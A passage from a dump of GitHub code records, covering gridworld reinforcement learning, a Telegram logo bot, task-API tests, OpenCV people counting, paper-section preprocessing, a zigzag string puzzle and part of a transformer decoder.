range(num_rows*num_cols):\n if state != 12 and state != 17 and state != 24:\n for action in [0, 1, 2, 3]:\n next_state = getState(state, action)\n if next_state in pred:\n pred[next_state].add((state, action))\n else:\n pred[next_state] = {(state, action)}\n \n while True:\n state = np.random.randint(num_rows*num_cols)\n while state == 12 or state == 17 or state == 24:\n state = np.random.randint(num_rows*num_cols)\n action = getAction(state, q, eps)\n next_state = getState(state, action)\n rew = getReward(next_state)\n q_old = q[state][action]\n q[state][action] = sum([prob*(rew + gamma*max(q[next_state])) for prob, next_state, rew in getAllStates(state, action)])\n p = q[state][action] - q_old\n if p > theta:\n if q_old == max(q[state]) or q[state][action] == max(q[state]):\n priorityQueuePush(-p, state)\n\n num_iter = 1\n while len(pq) > 0 and num_iter < max_iter:\n _, cur_state = heapq.heappop(pq)\n for pred_state, pred_act in pred[cur_state]:\n q_old = q[pred_state][pred_act]\n q[pred_state][pred_act] = sum([prob*(rew + gamma*max(q[next_state])) for prob, next_state, rew in getAllStates(pred_state, pred_act)])\n p = q[pred_state][pred_act] - q_old\n if p > theta:\n num_iter += 1\n if q_old == max(q[pred_state]) or q[pred_state][pred_act] == max(q[pred_state]):\n priorityQueuePush(-p, pred_state)\n \n v = np.sum(np.array(getPolicy(q, eps)) * q, axis=1)\n mse = np.sum((v_op.flatten() - v)**2) / 25\n mse_list.append(mse)\n if mse < 0.5:\n break\n eps = max(0.1, eps-0.02)\n\n print(np.sum(np.array(getPolicy(q, eps)) * q, axis=1))\n print(len(mse_list))\n return mse_list, q\n\neps = 1\nrepeat = 20\nmse_list = []\nmin_episodes = float(\"inf\")\nq_sum = np.zeros((num_rows*num_cols, 4), dtype=\"float\")\nfor i in range(repeat):\n print(i)\n mse, q = prioritySweep(eps, 0.1, 100)\n mse_list.append(mse)\n if len(mse) < min_episodes:\n min_episodes = len(mse)\n q_sum += q\n\nfor i in range(repeat):\n mse_list[i] = mse_list[i][:min_episodes]\nmse_list = np.sum(mse_list, axis = 0) / repeat\n\nplt.plot(range(min_episodes), mse_list)\nplt.xlabel(\"Number of Episodes\")\nplt.ylabel(\"Value Function - Mean Squared 
Error\")\nplt.savefig(\"ps_gridWorld\")\nplt.close()","repo_name":"satwikgoyal/RL-Algorithms-on-MC-and-Gridworld","sub_path":"Code/prioritySweep_gridWorld.py","file_name":"prioritySweep_gridWorld.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35545723864","text":"\n# standard libraries\nimport unittest\nfrom unittest import mock\nfrom unittest.mock import patch\n# local files\nfrom app import amp_gui\n\n\nclass TestUSBHandler(unittest.TestCase):\n @patch('builtins.print')\n def build_up(self, mock_print):\n root = amp_gui.ElectroChemGUI()\n return root, mock_print\n\n def test_cv_send_params(self):\n # done with app as a hack, fix this when more time\n app, mp = self.build_up() # type: amp_gui.ElectroChemGUI\n for call in mp.mock_calls:\n print(call)\n app.cv.device.send_cv_parameters()\n app.cv.settings.use_svw = True\n with mock.patch('builtins.print') as test_printer:\n # app.cv.run_button.invoke()\n app.cv.device.send_cv_parameters()\n\n print('=======')\n for call in test_printer.mock_calls:\n print(call)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"KyleLopin/Potentiostat_GUI","sub_path":"test_pre.py","file_name":"test_pre.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"25293993902","text":"from telegram.ext import Updater\nimport requests\n\nBOT_Token=\"7853451df5:SDSGHghjgjdsfgtyY0PXugoowhNL03vyI7w\"\nupdater = Updater(BOT_Token)\n\ndef incoming_message_action(update, context):\n image_url=requests.get('https://api.single-developers.software/logo?name='+(update.message.text).replace(' ','%20'))\n context.bot.sendPhoto(chat_id=update.message.chat.id, photo=image_url,\n reply_to_message_id=update.message.reply_to_message.message_id)\n\nupdater.dispatcher.add_handler( MessageHandler(Filters.text, incoming_message_action))\nupdater.start_polling()\nupdater.idle()\n","repo_name":"Single-Developers/API","sub_path":"logo/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"72"} +{"seq_id":"22004301350","text":"from h.db import db\nfrom h.models.task import Task, TaskState\nfrom h.models.list import List\nfrom h.models.board import Board\nfrom h.api import task_api as api\n\ntitle = 'title'\ndesc = 'desc'\n\n\ndef create_task():\n return api.create_task(title, desc)\n\n\ndef create_list(title='list title'):\n return api.create_list(title)\n\n\ndef create_board(title='board title'):\n return api.create_board(title)\n\n\ndef get_task_by_id(id):\n return db.query(Task).get(id)\n\n\ndef get_list(id):\n return db.query(List).get(id)\n\n\ndef get_board(id):\n return db.query(Board).get(id)\n\n\nclass TestBoardApi(object):\n def test_create_board(self):\n board_id = create_board()\n board = get_board(board_id)\n assert board.title == 'board title'\n\n def test_add_list_to_board(self):\n board_id = create_board()\n list_id = create_list()\n api.add_to_board(board_id, list_id)\n\n board = get_board(board_id)\n assert len(board.lists) == 1\n assert board.lists[0].title == 'list title'\n\n def test_remove_list_from_board(self):\n board_id = create_board()\n list_id = create_list()\n api.add_to_board(board_id, list_id)\n\n board = get_board(board_id)\n assert len(board.lists) == 1\n assert board.lists[0].title == 'list title'\n\n 
api.remove_from_board(board_id, list_id)\n        board = get_board(board_id)\n        assert len(board.lists) == 0\n\n\nclass TestListApi(object):\n    def test_create_list(self):\n        list_id = create_list()\n        list = get_list(list_id)\n        assert list.title == 'list title'\n\n    def test_add_task_to_list(self):\n        task_id = create_task()\n        list_id = create_list()\n        api.add_to_list(list_id, task_id)\n\n        list = get_list(list_id)\n        assert len(list.tasks) == 1\n        assert list.tasks[0].title == 'title'\n        assert list.tasks[0].description == 'desc'\n\n    def test_remove_task_from_list(self):\n        task_id = create_task()\n        list_id = create_list()\n        api.add_to_list(list_id, task_id)\n\n        list = get_list(list_id)\n        assert len(list.tasks) == 1\n        assert list.tasks[0].title == 'title'\n\n        api.remove_from_list(list_id, task_id)\n        list = get_list(list_id)\n        assert len(list.tasks) == 0\n\n    def test_task_to_be_in_backlog_on_creation(self):\n        backlog_id = api.backlog_id\n        task_id = create_task()\n        task = get_task_by_id(task_id)\n        assert backlog_id in [task_list.id for task_list in task.list]\n\n    def test_task_can_be_moved_from_one_list_to_another(self):\n        backlog_id = api.backlog_id\n        task_id = create_task()\n        todo_list_id = create_list('todo')\n        api.move_task(backlog_id, todo_list_id, task_id)\n        task = get_task_by_id(task_id)\n        task_list_ids = [task_list.id for task_list in task.list]\n        assert backlog_id not in task_list_ids\n        assert todo_list_id in task_list_ids\n\n\nclass TestTaskApi():\n    def test_create_task(self):\n        task_id = create_task()\n\n        q_task = get_task_by_id(task_id)\n        assert q_task.title == title\n        assert q_task.description == desc\n\n    def test_add_time(self):\n        task_id = create_task()\n\n        minutes1 = 10\n        desc1 = 'dummy description'\n\n        api.add_time(task_id, minutes1, desc1)\n\n        q_task = get_task_by_id(task_id)\n        assert len(q_task.times) == 1\n        assert q_task.times[0].minutes == minutes1\n        assert q_task.times[0].description == desc1\n\n    def test_start_task(self):\n        task_id = create_task()\n        api.start_task(task_id)\n        q_task = get_task_by_id(task_id)\n        assert q_task.state == TaskState.IN_PROGRESS\n\n    def test_complete_task(self):\n        task_id = create_task()\n        api.start_task(task_id)\n        api.complete_task(task_id)\n        q_task = get_task_by_id(task_id)\n        assert q_task.state == TaskState.COMPLETED\n","repo_name":"ahmedshuhel/ht","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70667965354","text":"import time\nfrom functools import wraps\n\n\ndef stop_watch(func: callable) -> callable:\n\t\"\"\"\tMeasure a function's execution time\n\n\tArgs:\n\t\t\tfunc (callable): function to be measured\n\n\tReturns:\n\t\t\tcallable: the wrapped function\n\t\"\"\"\n\t@wraps(func)\n\tdef wrapper(*args, **kargs) :\n\t\tstart = time.time()\n\t\tresult = func(*args, **kargs)\n\t\tprocess_time = time.time() - start\n\t\tprint(f\"-- {func.__name__} : {int(process_time)}[sec] / {int(process_time/60)}[min]\")\n\t\treturn result\n\treturn wrapper\n\n\ndef decode_area(region: tuple) -> tuple[int, list, float]:\n\t\"\"\" Convert region data into label, coords, and area\n\n\tArgs:\n\t\t\tregion (tuple): region CSV data extracted with PyMeanShift\n\n\tReturns:\n\t\t\ttuple: label number, coordinates, and area\n\t\"\"\"\n\t# Region ID\n\tlabel = int(region[0])\n\t# Coordinates\n\tcoords = [\n\t\t(int(coord_str[1:-1].split(' ')[0]), int(coord_str[1:-1].split(' ')[1])) \n\t\tfor coord_str in region[1:-2]\n\t]\n\t# Area\n\tarea = int(region[-2])\n\n\treturn label, coords, area\n\n\ndef is_index(size: tuple[int, int, int], coordinate: tuple[int, int]) -> bool:\n\t\"\"\"\tCheck whether a tuple coordinate lies inside the image area\n\n\tArgs:\n\t\t\tsize (tuple[int, int, int]): image size\n\t\t\tcoordinate (tuple[int, int]): tuple coordinate\n\n\tReturns:\n\t\t\tbool: whether the coordinate is in bounds\n\t\"\"\"\n\t# (0 <= y < height) & (0 <= x < width)\n\tif \t(((coordinate[0] >= 0) and (coordinate[0] < size[0])) \n\tand ((coordinate[1] >= 0) and (coordinate[1] < size[1]))):\n\t\treturn True\n\telse:\n\t\treturn False\n","repo_name":"donuthole8/sediment-flow","sub_path":"modules/utils/common_util.py","file_name":"common_util.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15452026429","text":"# Import the required packages\nfrom argparse import ArgumentParser\nimport cv2\nimport dlib\nimport imutils\nimport numpy as np\nimport time\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nfrom scipy.spatial import distance as dist\nfrom collections import OrderedDict\n\n\nclass TrackableObj:\n    def __init__(self, objectID, centroid):\n        self.objID = objectID\n        self.centroids = [centroid]\n        self.counted = False\n\n\nclass CentroidTrk:\n    def __init__(self, maxDisappeared=50, maxDistance=50):\n        self.nxtObjectID = 0\n        self.objs = OrderedDict()\n        self.desaparecidos = OrderedDict()\n\n        self.mxDisappeared = maxDisappeared\n\n        self.mxDistance = maxDistance\n\n    def deregister(self, objectID):\n        del self.objs[objectID]\n        del self.desaparecidos[objectID]\n\n    def register(self, centroid):\n        self.objs[self.nxtObjectID] = centroid\n        self.desaparecidos[self.nxtObjectID] = 0\n        self.nxtObjectID += 1\n\n    def update(self, rects):\n        if len(rects) == 0:\n            for objectID in list(self.desaparecidos.keys()):\n                self.desaparecidos[objectID] += 1\n                if self.desaparecidos[objectID] > self.mxDisappeared:\n                    self.deregister(objectID)\n            return self.objs\n\n        inputCentroids = np.zeros((len(rects), 2), dtype=\"int\")\n\n        for (i, (startX, startY, endX, endY)) in enumerate(rects):\n            cX = int((startX + endX) / 2.0)\n            cY = int((startY + endY) / 2.0)\n            inputCentroids[i] = (cX, cY)\n\n        if len(self.objs) == 0:\n            for i in range(0, len(inputCentroids)):\n                self.register(inputCentroids[i])\n\n        else:\n            objectIDs = list(self.objs.keys())\n            objectCentroids = list(self.objs.values())\n\n            D = dist.cdist(np.array(objectCentroids), inputCentroids)\n\n            rows = D.min(axis=1).argsort()\n            cols = D.argmin(axis=1)[rows]\n\n            usedCols = set()\n            usedRows = set()\n\n            for (row, col) in zip(rows, cols):\n                if row in usedRows or col in usedCols:\n                    continue\n\n                if D[row, col] > self.mxDistance:\n                    continue\n\n                objectID = objectIDs[row]\n                self.objs[objectID] = inputCentroids[col]\n                self.desaparecidos[objectID] = 0\n\n                usedRows.add(row)\n                usedCols.add(col)\n\n            unusedRows = set(range(0, D.shape[0])).difference(usedRows)\n            unusedCols = set(range(0, D.shape[1])).difference(usedCols)\n\n            if D.shape[0] >= D.shape[1]:\n                for row in unusedRows:\n                    objectID = objectIDs[row]\n                    self.desaparecidos[objectID] += 1\n\n                    if self.desaparecidos[objectID] > self.mxDisappeared:\n                        self.deregister(objectID)\n\n            else:\n                for col in unusedCols:\n                    self.register(inputCentroids[col])\n\n        return self.objs\n\n\nclass CrowdControl:\n    def __init__(self):\n        # Parse the command-line arguments\n        self.argumentos = ArgumentParser()\n        self.argumentos.add_argument(\"-i\", \"--input\", type=str,\n                                     help=\"path to the input video\")\n        self.argumentos.add_argument(\"-o\", \"--output\", type=str,\n                                     help=\"path to the output video\")\n        self.argumentos = 
vars(self.argumentos.parse_args())\n\n        # Initialize the list of classes the MobileNet SSD model was trained to detect\n        CLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n                   \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n                   \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n                   \"sofa\", \"train\", \"tvmonitor\"]\n\n        # load the serialized models from disk\n        net = cv2.dnn.readNetFromCaffe(\n            \"mobilenet_ssd/MobileNetSSD_deploy.prototxt\", \"mobilenet_ssd/MobileNetSSD_deploy.caffemodel\")\n\n        # If no video path was specified, use the webcam as the video stream\n        if not self.argumentos.get(\"input\", False):\n            vs = VideoStream(src=0).start()\n            time.sleep(2.0)\n\n        # otherwise, open the specified video file\n        else:\n            vs = cv2.VideoCapture(self.argumentos[\"input\"])\n\n        # Initialize the video writer\n        writer = None\n\n        # Initialize the frame dimensions\n        W = None\n        H = None\n\n        # Instantiate the centroid tracker, then initialize a list to store\n        # each of the dlib correlation trackers, followed by a dictionary\n        # mapping each unique object ID to a TrackableObj\n        ct = CentroidTrk(maxDisappeared=40, maxDistance=50)\n        trackers = []\n        trackableObjects = {}\n\n        # Initialize the total number of frames processed so far, along with\n        # the running counts of objects that moved up or down\n        totalFrames, totalDown, totalUp = (0, 0, 0)\n\n        # Initialize the frames-per-second estimate\n        fps = FPS().start()\n\n        # Main loop over the frames of the video stream\n        while True:\n            # Grab the next frame, handling VideoCapture and VideoStream\n            # sources differently\n\n            quadro = vs.read()\n            quadro = quadro[1] if self.argumentos.get(\"input\", False) else quadro\n\n            # If we are reading from a video file and could not grab the next\n            # frame, we have reached the end of the video\n\n            if self.argumentos[\"input\"] is not None and quadro is None:\n                break\n\n            # resize the frame to a maximum of 500 pixels (the less data to\n            # analyze, the faster the analysis), then convert it from BGR to\n            # RGB for later processing with dlib\n\n            quadro = imutils.resize(quadro, width=500)\n            rgb = cv2.cvtColor(quadro, cv2.COLOR_BGR2RGB)\n\n            # If the frame dimensions are empty, set them\n            if W is None or H is None:\n                (H, W) = quadro.shape[:2]\n\n            # If the video is to be saved to disk, initialize the writer\n            if self.argumentos[\"output\"] is not None and writer is None:\n                fourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n                writer = cv2.VideoWriter(self.argumentos[\"output\"], fourcc, 30,\n                                         (W, H), True)\n\n            # Initialize the current processing status\n            status = \"Aguardando\"\n            rects = []\n\n            # Decide whether detection (rather than tracking) should run on\n            # this frame\n            if totalFrames % 30 == 0:\n                # Set the status and initialize a new list of trackers\n                status = \"Detectando\"\n                trackers = []\n\n                # Convert the frame to a blob and pass the blob through the\n                # network to obtain the detections\n                blob = cv2.dnn.blobFromImage(quadro, 0.007843, (W, H), 127.5)\n                net.setInput(blob)\n                deteccao = net.forward()\n\n                # Loop over the detections\n                for i in np.arange(0, deteccao.shape[2]):\n                    # extract the confidence associated with the prediction\n                    confianca = deteccao[0, 0, i, 2]\n\n                    # filter out weak detections by requiring a minimum confidence\n                    if confianca > 0.4:\n                        # extract the index of the class label from the detections list\n                        idx = int(deteccao[0, 0, i, 1])\n\n                        # If the class is not a person, ignore it.\n                        if CLASSES[idx] != \"person\":\n                            continue\n\n                        # compute the (x, y) coordinates of the bounding box\n                        # for the object\n\n                        box = deteccao[0, 0, i, 3:7] * np.array([W, H, W, H])\n                        (sX, sY, eX, eY) = box.astype(\"int\")\n\n                        # construct a dlib rectangle and start the correlation tracker\n                        tracker = dlib.correlation_tracker()\n                        rect = dlib.rectangle(sX, sY, eX, eY)\n                        tracker.start_track(rgb, rect)\n\n                        # add the tracker to the list of trackers\n                        trackers.append(tracker)\n\n            else:\n                # loop over the trackers\n                for tracker in trackers:\n                    status = \"Rastreando\"\n\n                    # update the tracker and grab its position\n                    tracker.update(rgb)\n                    posicao = tracker.get_position()\n\n                    # store the object's position\n                    sX = int(posicao.left())\n                    sY = int(posicao.top())\n                    eX = int(posicao.right())\n                    eY = int(posicao.bottom())\n\n                    # add the object's position to the list of bounding boxes\n                    rects.append((sX, sY, eX, eY))\n\n            # draw a horizontal line in the center of the frame; once an object\n            # crosses this line we determine whether it is entering or leaving\n            cv2.line(quadro, (0, H // 2),\n                     (W, H // 2), (0, 255, 0), 2)\n\n            # Use the centroid tracker to associate the old centroids with\n            # the newly computed ones\n            objects = ct.update(rects)\n\n            # loop over the tracked objects\n            for (objID, centroid) in objects.items():\n                # check if a trackable object exists for the current object ID\n                to = trackableObjects.get(objID, None)\n\n                # if there is no trackable object, create one\n                if to is None:\n                    to = TrackableObj(objID, centroid)\n\n                # otherwise, use the existing trackable object to determine the direction\n                else:\n                    # the difference between the y-coordinate of the current\n                    # centroid and the mean of the previous ones tells us\n                    # whether the object is moving into or out of the\n                    # public space\n\n                    x = [i[1] for i in to.centroids]\n\n                    direction = centroid[1] - np.mean(x)\n\n                    to.centroids.append(centroid)\n\n                    # check whether the object has already been counted\n                    if not to.counted:\n                        # If the direction is negative (the object is moving\n                        # up) and the centroid is above the center line,\n                        # count the object\n\n                        if direction < 0 and centroid[1] < H // 2:\n                            totalUp += 1\n                            to.counted = True\n\n                        # If the direction is positive (the object is moving\n                        # down) and the centroid is below the center line,\n                        # count the object\n                        elif direction > 0 and centroid[1] > H // 2:\n                            totalDown += 1\n                            to.counted = True\n\n                # store the trackable object in the dictionary\n                trackableObjects[objID] = to\n\n                # draw both the object ID and the centroid on the output frame\n                text = \"ID {}\".format(objID)\n                cv2.putText(quadro, text, (centroid[0] - 10, centroid[1] - 10),\n                            cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n                cv2.circle(\n                    quadro, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n            # build a tuple with the information displayed on the frame\n            info = [\n                (\"Entrando\", totalUp),\n                (\"Saindo\", totalDown),\n                (\"Lotacao\", totalUp - totalDown),\n            ]\n\n            # iterate over the info tuple and draw it on the frame\n            for (i, (k, v)) in enumerate(info):\n                text = \"{}: {}\".format(k, v)\n                cv2.putText(quadro, text, (10, H - ((i * 20) + 20)),\n                            cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\n            # check if the frame should be written to disk\n            if writer is not None:\n                writer.write(quadro)\n\n            # show the output frame\n            cv2.imshow(\"Frame\", quadro)\n            key = cv2.waitKey(1) & 0xFF\n\n            # if the `q` key was pressed, break the loop\n            if key == ord(\"q\"):\n                break\n\n            # increment the total number of processed frames and update the FPS counter\n            totalFrames += 1\n            fps.update()\n\n        # stop the timer and display the FPS\n        fps.stop()\n\n        # check whether the video writer needs to be released\n        if writer is not None:\n            writer.release()\n\n        # if a video file is not being used, stop the camera video stream\n        if not self.argumentos.get(\"input\", False):\n            vs.stop()\n\n        # otherwise, release the video file pointer\n        else:\n            vs.release()\n\n        # close all windows\n        cv2.destroyAllWindows()\n\nCrowdControl()","repo_name":"liquuid/pi4","sub_path":"crowdcontrol.py","file_name":"crowdcontrol.py","file_ext":"py","file_size_in_byte":13658,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"21429564016","text":"from os import mkdir, listdir\nfrom os.path import isdir\n\nfrom pandas import read_csv, DataFrame\nfrom nltk import sent_tokenize\n\nfrom Utilities.preprocess_data import preprocessed_text\n\n\ndef removeLines(text: str) -> str:\n    tokens = sent_tokenize(text)\n    return ' \\n\\n'.join([token for token in tokens if len(token.split()) > 3])\n\n\ndef preprocess(text: str) -> str:\n    text = text.strip()\n    if text != '' and str.isalnum(text[-1]):\n        text += '.'\n    return text\n\n\ndef savefile(text: str, path: str):\n    with open(path, 'w') as f:\n        f.write(text)\n\n\ndef addNone(text: str) -> str:\n    if len(text) == 0:\n        return str('None.')\n    else:\n        return text\n\n\ndef makeSectionFolders():\n    df = read_csv('Data/Sections-DataFrame/sections.csv', index_col='ID')\n\n    for section in ['Abstract', 'Conclusions', 'Discussion', 'Introduction']:\n\n        section_df = df[[section]]\n        section_df.fillna('None.', inplace=True)\n\n        section_df.loc[:, section] = section_df.loc[:, section].map(str).apply(\n            lambda x: preprocessed_text(x, keep_parenthesis=True)).apply(removeLines)\n\n        section_df.loc[:, section] = section_df.loc[:, section].apply(preprocess)\n        section_df.loc[:, section] = section_df.loc[:, section].apply(addNone)\n\n        if not isdir(f'Data/Input-wMVC/{section}/'):\n            mkdir(f'Data/Input-wMVC/{section}/')\n\n        for idx, inputs in zip(section_df.index, section_df.loc[:, section]):\n            savefile(inputs, f'Data/Input-wMVC/{section}/{idx}.txt')\n\n\ndef getSectionDataFrames():\n    # Folder must contain FULLTEXT & ABSTRACT files for each doc in it\n    testset_path = 'Data/Input-Data/'\n\n    testset_data = {\n        'ID': [],\n        'Prefix': [],\n        'Title': [],\n        'Full_Text': [],\n        'Abstract': []\n    }\n\n    ID_set = set()\n\n    for file in listdir(testset_path):\n        if not file.startswith('.'):\n            ID_set.add(file.split('_')[0])\n\n    ID_set = list(ID_set)\n\n    for ID in ID_set:\n        testset_data['ID'].append(ID)\n        for file in listdir(testset_path):\n            if not file.startswith('.'):\n                if file.split('_')[0] == ID:\n                    if file.split('_')[1] == 'ABSTRACT':\n                        with open(testset_path + file, 'r') as f:\n                            testset_data['Prefix'].append(f.readline())\n                            for _ in range(5):\n                                f.readline()\n                            testset_data['Title'].append(f.readline())\n                            f.readline()\n                            testset_data['Abstract'].append(' '.join(f.read().split('PARAGRAPH')[:]))\n\n                    elif file.split('_')[1] == 'FULLTEXT':\n                        with open(testset_path + file, 'r') as f:\n                            for _ in range(8):\n                                f.readline()\n                            testset_data['Full_Text'].append(f.read())\n\n    testdata_df = DataFrame(testset_data)\n\n    # Getting separate sections from FULLTEXT\n\n    introduction = []\n    discussion = []\n    conclusions = []\n\n    for idx, fulltext in 
enumerate(testdata_df.iloc[:, 3]):\n intro = ''\n conc = ''\n disc = ''\n for text in fulltext.split('SECTION\\n\\n')[1:]:\n if 'introduction' in text.split('PARAGRAPH')[0].lower():\n intro = intro + ''.join(text.split('PARAGRAPH')[1:])\n\n elif 'discussion' in text.split('PARAGRAPH')[0].lower():\n disc = disc + ''.join(text.split('PARAGRAPH')[1:])\n\n elif 'conclusion' in text.split('PARAGRAPH')[0].lower():\n conc = conc + ''.join(text.split('PARAGRAPH')[1:])\n\n if intro == '':\n introduction.append(None)\n else:\n introduction.append(intro)\n\n if conc == '':\n conclusions.append(None)\n else:\n conclusions.append(conc)\n\n if disc == '':\n discussion.append(None)\n else:\n discussion.append(disc)\n\n testdata_df['Introduction'] = introduction\n testdata_df['Discussion'] = discussion\n testdata_df['Conclusions'] = conclusions\n\n # Saving DataFrame\n testdata_df.index = testdata_df.ID\n testdata_df.drop('ID', axis=1, inplace=True)\n testdata_df.to_csv('Data/Sections-DataFrame/sections.csv')\n\n\ndef prepareData():\n getSectionDataFrames()\n makeSectionFolders()\n","repo_name":"anuragjoshi3519/laysumm20","sub_path":"Utilities/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"30422314899","text":"class Solution(object):\n def convert(self, s, numRows):\n \"\"\"\n :type s: str\n :type numRows: int\n :rtype: str\n \"\"\"\n if numRows <= 0:\n return None\n if numRows == 1:\n return s\n\n # each index represents a stage in the cycle\n vals = [''] * numRows\n # value that iterates through the cycle\n index = 0\n direction = 0\n for ch in s:\n vals[index] += ch\n # we need to step up\n if index == 0:\n direction = 1\n elif index == numRows-1:\n direction = -1\n index += direction\n return ''.join(vals)\n \n","repo_name":"KaranPhadnisNaik/leetcode","sub_path":"0006.ZigZagConversion.py","file_name":"0006.ZigZagConversion.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19369828325","text":"print(\"hello world!\")\n\nname = \"Tuba\"\n\nnumber_of_students = 71\n\n#Here is some useful information!\n\nfor i in range(2):\n print('Tuba')\n\n# Today we have seen new commands on Git and GitHub\n\n","repo_name":"tubakadriye/PYTHON_PROJECT","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73899645992","text":"#!/usr/bin/env python\r\n\r\nfrom twisted.internet.protocol import Factory,Protocol\r\nfrom twisted.internet import reactor\r\nfrom twisted.protocols.basic import LineOnlyReceiver\r\nfrom twisted.python import log\r\n\r\nfrom buildbot.changes.svnpoller import SVNPoller\r\n\r\n\r\nclass SVNListenerProtocol(LineOnlyReceiver):\r\n hostname = None\r\n peername = None\r\n delimiter = '\\n'\r\n \r\n def connectionMade(self):\r\n peer = self.transport.getPeer()\r\n host = self.transport.getHost()\r\n self.peername = '%s:%s'%(peer.host, peer.port)\r\n self.hostname = '%s:%s'%(host.host, host.port)\r\n log.msg(\"CVSListenerProtocol: connection made from %s to %s\"%\r\n (self.peername, self.hostname))\r\n \r\n def lineReceived(self,line):\r\n line = line.rstrip('\\r')\r\n #print \"Data:%s:\" % data\r\n if line == self.factory.signature:\r\n if self.factory.delayed and self.factory.delayed.active():\r\n 
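# A poll is already scheduled: restart the stability countdown so that a\r\n                # burst of commit notifications coalesces into a single SVN check.\r\n                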
self.factory.delayed.reset(self.factory.delay)\r\n elif self.factory.poller and not self.factory.poller.working:\r\n log.msg(\"SVNListenerProtocol: initiating SVN check on behalf of %s\"%self.peername)\r\n self.factory.delayed = reactor.callLater(self.factory.delay,\r\n self.factory.poller.checkcvs)\r\n else:\r\n if len(line) > len(self.factory.signature):\r\n line = '%s...'%line[:len(self.factory.signature) + 10]\r\n log.msg(\"SVNListenerProtocol: invalid signature sent from %s: %s\"%\r\n (self.peername, line))\r\n self.transport.loseConnection()\r\n \r\n \r\nclass SVNListenerFactory(Factory):\r\n protocol = SVNListenerProtocol\r\n delayed = None\r\n \r\n def __init__(self, poller, signature, commitStableTimer=30):\r\n assert isinstance(poller, SVNPoller)\r\n self.poller = poller\r\n self.signature = signature\r\n self.delay = commitStableTimer\r\n\r\n\r\ndef startSVNListener(poller,signature,port):\r\n reactor.listenTCP(port,SVNListenerFactory(poller,signature))\r\n \r\n","repo_name":"gridlab-d/tools","sub_path":"buildbot/src/localbb/changes/svnlistener.py","file_name":"svnlistener.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"21703548583","text":"import torch\nimport torch.nn as nn\nfrom torch import Tensor\nimport torch.nn.functional as F\nfrom typing import Optional, List\nimport torch.nn.init as init\nimport copy\n\n# class SelfAttention(nn.Module):\n# def __init__(\n# self, dim, heads=8, qkv_bias=False, qk_scale=None, dropout_rate=0.0\n# ):\n# super().__init__()\n# self.num_heads = heads\n# head_dim = dim // heads\n# self.scale = qk_scale or head_dim ** -0.5\n\n# self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n# self.attn_drop = nn.Dropout(dropout_rate)\n# self.proj = nn.Linear(dim, dim)\n# self.proj_drop = nn.Dropout(dropout_rate)\n\n# def forward(self, x):\n# B, N, C = x.shape\n# qkv = (\n# self.qkv(x)\n# .reshape(B, N, 3, self.num_heads, C // self.num_heads)\n# .permute(2, 0, 3, 1, 4)\n# )\n# q, k, v = (\n# qkv[0],\n# qkv[1],\n# qkv[2],\n# ) # make torchscript happy (cannot use tensor as tuple)\n\n# attn = (q @ k.transpose(-2, -1)) * self.scale\n# attn = attn.softmax(dim=-1)\n# attn = self.attn_drop(attn)\n\n# x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n# x = self.proj(x)\n# x = self.proj_drop(x)\n# return x\n\nclass DecoderLayer(nn.Module):\n def __init__(self, self_attention, cross_attention, d_model, d_ff=None,\n dropout=0.1, activation=\"relu\"):\n super(DecoderLayer, self).__init__()\n d_ff = d_ff or 4*d_model\n self.self_attention = self_attention\n self.cross_attention = cross_attention\n self.conv1 = nn.Conv1d(in_channels=d_model, out_channels=d_ff, kernel_size=1)\n self.conv2 = nn.Conv1d(in_channels=d_ff, out_channels=d_model, kernel_size=1)\n self.norm1 = nn.LayerNorm(d_model)\n self.norm2 = nn.LayerNorm(d_model)\n self.norm3 = nn.LayerNorm(d_model)\n self.dropout = nn.Dropout(dropout)\n self.activation = F.relu if activation == \"relu\" else F.gelu\n\n def forward(self, x, cross, x_mask=None, cross_mask=None):\n x = x + self.dropout(self.self_attention(\n x, x, x,\n attn_mask=x_mask\n ))\n x = self.norm1(x)\n\n x = x + self.dropout(self.cross_attention(\n x, cross, cross,\n attn_mask=cross_mask\n ))\n\n y = x = self.norm2(x)\n y = self.dropout(self.activation(self.conv1(y.transpose(-1,1))))\n y = self.dropout(self.conv2(y).transpose(-1,1))\n\n return self.norm3(x+y)\n\n\nclass Decoder(nn.Module):\n def __init__(self, layers, norm_layer=None):\n 
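# Run the input through each decoder layer in turn; `norm_layer`, if\n        # supplied, normalizes the final output (see forward below).\n        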
